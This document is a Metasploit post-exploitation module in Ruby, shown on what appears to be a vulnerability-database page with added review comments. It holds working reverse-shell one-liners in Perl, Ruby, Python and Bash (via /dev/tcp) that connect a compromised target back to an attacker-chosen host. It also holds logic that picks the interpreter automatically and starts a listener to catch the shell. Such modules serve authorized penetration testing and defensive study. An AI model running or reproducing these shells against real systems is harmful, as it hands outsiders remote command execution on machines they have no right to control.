Multi Manage System Remote TCP Shell Session

🗓️ 18 Oct 2011 23:31:04 · Reported by Carlos Perez <[email protected]> · Type
metasploit
 metasploit

Creates a reverse TCP shell on the target system using a scripting environment already installed there.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  # Registers module metadata and the LHOST / LPORT / HANDLER / TYPE options.
  #
  # TYPE defaults to 'auto', which probes the target for an interpreter in a
  # fixed order (see auto_create_session). HANDLER, when true, starts a local
  # multi/handler (see create_multihand) before the command is sent.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Manage System Remote TCP Shell Session',
        'Description' => %q{
          This module will create a Reverse TCP Shell on the target system
          using the system's own scripting environments installed on the
          target.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => %w[linux osx unix],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )
    register_options(
      [
        OptAddressLocal.new('LHOST',
                            [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT',
                   [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),
        OptEnum.new('TYPE', [
          true, 'Scripting environment on target to use for reverse shell',
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']
        ])
      ]
    )
  end

  # Run Method for when run command is issued.
  #
  # Order of operations: start the local handler first (only if HANDLER is
  # set), build the command string for the selected TYPE, then execute it on
  # the session inside a backgrounded subshell. Nothing is executed when the
  # builder returns ''.
  def run
    create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']
    lhost = datastore['LHOST']
    lport = datastore['LPORT']
    cmd = ''

    begin
      # Each builder probes the target with cmd_exec and returns '' (after
      # printing an error) when the interpreter is not present.
      case datastore['TYPE']
      when /auto/i
        cmd = auto_create_session(lhost, lport)
      when /ruby/i
        cmd = ruby_session(lhost, lport)
      when /python/i
        cmd = python_session(lhost, lport)
      when /perl/i
        cmd = perl_session(lhost, lport)
      when /bash/i
        cmd = bash_session(lhost, lport)
      end
    # NOTE(review): any StandardError raised while probing or building the
    # command is swallowed here without output, so cmd stays '' and the
    # module finishes silently; printing the error would make failures
    # visible to the operator.
    rescue StandardError
    end

    if !cmd.empty?
      print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
      # Wrapped in "( ... &)" so the command is backgrounded in a subshell.
      cmd_exec("(#{cmd} &)")
    end
  end

  # Runs a reverse tcp shell with the scripting environment found.
  #
  # Probes the target in a fixed order (perl, ruby, python, bash) using
  # version commands and delegates to the matching *_session builder. Each
  # builder repeats the same probe, so a detected interpreter is probed
  # twice. The python check only matches "Python 2.x" output.
  #
  # @param lhost [String] address the shell should connect back to
  # @param lport [Integer] port the shell should connect back to
  # @return [String] the command to execute, or '' if nothing was found
  def auto_create_session(lhost, lport)
    cmd = ''

    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl was found on target')
      cmd = perl_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby was found on target')
      cmd = ruby_session(lhost, lport)
      vprint_status("Running #{cmd}")

    # NOTE(review): Python 2's `-V` writes its banner to stderr; whether
    # cmd_exec returns stderr for this session type is not visible here —
    # confirm, otherwise this branch never matches.
    elsif cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python was found on target')
      cmd = python_session(lhost, lport)
      vprint_status("Running #{cmd}")

    elsif cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash was found on target')
      cmd = bash_session(lhost, lport)
      vprint_status("Running #{cmd}")
    else
      print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')
    end

    return cmd
  end

  # Method for checking if a listener for a given IP and port is present;
  # will return true if a conflict exists and false if none is found.
  #
  # Walks the framework's job list, keeps only jobs whose name matches
  # " multi/handler", and compares each job's LHOST/LPORT with the given
  # values. Every conflicting job is reported with print_error; the loop
  # does not stop at the first match.
  #
  # NOTE(review): lhost is compared as a plain string with no address
  # normalization, while lport is compared against current_lport.to_i —
  # confirm the datastore types match what the caller passes in.
  #
  # @param lhost [String] address to check
  # @param lport [Integer] port to check
  # @return [Boolean] true when a multi/handler job already uses lhost:lport
  def check_for_listner(lhost, lport)
    conflict = false
    client.framework.jobs.each do |_k, j|
      next unless j.name =~ %r{ multi/handler}

      current_id = j.jid
      current_lhost = j.ctx[0].datastore['LHOST']
      current_lport = j.ctx[0].datastore['LPORT']
      if (lhost == current_lhost) && (lport == current_lport.to_i)
        print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
        conflict = true
      end
    end
    return conflict
  end

  # Starts a exploit/multi/handler session.
  #
  # Builds a generic/shell_reverse_tcp payload with the given LHOST/LPORT,
  # then — unless check_for_listner reports a conflict — creates a
  # multi/handler that shares the payload datastore, validates its options,
  # and runs it as a job with ExitOnSession disabled.
  #
  # NOTE(review): "Starting exploit/multi/handler" is printed before the
  # conflict check, and the conflict message says only "same Port" although
  # check_for_listner requires both host and port to match.
  #
  # @param lhost [String] address the handler listens on
  # @param lport [Integer] port the handler listens on
  def create_multihand(lhost, lport)
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    print_status('Starting exploit/multi/handler')
    if !check_for_listner(lhost, lport)
      # Set options for module
      mul = client.framework.exploits.create('multi/handler')
      mul.share_datastore(pay.datastore)
      mul.datastore['WORKSPACE'] = client.workspace
      mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
      mul.datastore['EXITFUNC'] = 'thread'
      mul.datastore['ExitOnSession'] = false
      # Validate module options
      mul.options.validate(mul.datastore)
      # Execute showing output
      mul.exploit_simple(
        'Payload' => mul.datastore['PAYLOAD'],
        'LocalInput' => user_input,
        'LocalOutput' => user_output,
        'RunAsJob' => true
      )
    else
      print_error('Could not start handler!')
      print_error('A job is listening on the same Port')
    end
  end

  # Perl reverse TCP Shell.
  #
  # Re-probes `perl -v` and returns the one-liner with lhost/lport
  # interpolated, or '' (after print_error) when the probe does not match.
  #
  # @return [String]
  def perl_session(lhost, lport)
    if cmd_exec('perl -v') =~ /Larry/
      print_status('Perl reverse shell selected')
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \
            "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Ruby reverse TCP Shell.
  #
  # Re-probes `ruby -v` and returns the one-liner with lhost/lport
  # interpolated, or '' (after print_error) when the probe does not match.
  # Unlike perl_session, the success path returns directly from the if.
  #
  # @return [String]
  def ruby_session(lhost, lport)
    if cmd_exec('ruby -v') =~ /revision/i
      print_status('Ruby reverse shell selected')
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \
             "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Python reverse TCP Shell.
  #
  # Re-probes `python -V` (matching only "Python 2.x") and returns the
  # one-liner with lhost/lport interpolated, or '' (after print_error) when
  # the probe does not match.
  #
  # @return [String]
  def python_session(lhost, lport)
    if cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_status('Python reverse shell selected')
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
             "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \
             "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end

  # Bash reverse TCP Shell.
  #
  # Re-probes `bash --version` and returns the one-liner with lhost/lport
  # interpolated, or '' (after print_error) when the probe does not match.
  #
  # @return [String]
  def bash_session(lhost, lport)
    if cmd_exec('bash --version') =~ /GNU bash/
      print_status('Bash reverse shell selected')
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
    else
      print_error('No scripting environment found for the selected type.')
      cmd = ''
    end
    return cmd
  end
end
